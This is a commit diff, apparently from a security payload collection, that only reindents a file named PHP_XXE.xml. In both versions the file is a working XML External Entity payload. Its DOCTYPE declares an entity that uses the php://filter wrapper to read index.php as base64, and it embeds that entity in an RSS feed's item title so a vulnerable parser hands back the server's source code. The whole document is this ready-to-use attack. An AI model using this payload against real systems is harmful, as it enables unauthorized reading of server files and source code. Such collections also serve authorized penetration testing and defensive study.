hddananjaya · April 6, 2019 02:26
diff --git a/PHP_XXE.xml b/PHP_XXE.xml
 <!-- Read Local Files using a PHP wrapper -->
 <?xml version="1.0" encoding="utf-8"?>
 <!DOCTYPE foo [
 <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=index.php">]>

 <rss version="2.0">
        <channel>

                <title>Example Feed</title>
                <description>Insert witty or insightful remark here</description>
                <link>http://example.org/</link>
                <lastBuildDate>Sat, 13 Dec 2003 18:30:02 GMT</lastBuildDate>
                <managingEditor>[email protected] (John Doe)</managingEditor>

                <item>
                        <title>&xxe;</title>
                        <link>http://example.org/2003/12/13/atom03</link>
                        <guid isPermaLink="false">urn:uuid:1225c695-cfb8-4ebb-aaaa-80da344efa6a</guid>
                        <pubDate>Sat, 13 Dec 2003 18:30:02 GMT</pubDate>
                        <description>Some text.</description>
                </item>

        </channel>
 </rss>
	<!-- Read Local Files using a PHP wrapper -->
	<?xml version="1.0" encoding="utf-8"?>
	<!DOCTYPE foo [
	<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=index.php">]>

	<rss version="2.0">
	<channel>

	<title>Example Feed</title>
	<description>Insert witty or insightful remark here</description>
	<link>http://example.org/</link>
	<lastBuildDate>Sat, 13 Dec 2003 18:30:02 GMT</lastBuildDate>
	<managingEditor>[email protected] (John Doe)</managingEditor>

	<item>
	<title>&xxe;</title>
	<link>http://example.org/2003/12/13/atom03</link>
	<guid isPermaLink="false">urn:uuid:1225c695-cfb8-4ebb-aaaa-80da344efa6a</guid>
	<pubDate>Sat, 13 Dec 2003 18:30:02 GMT</pubDate>
	<description>Some text.</description>
	</item>

	</channel>
	</rss>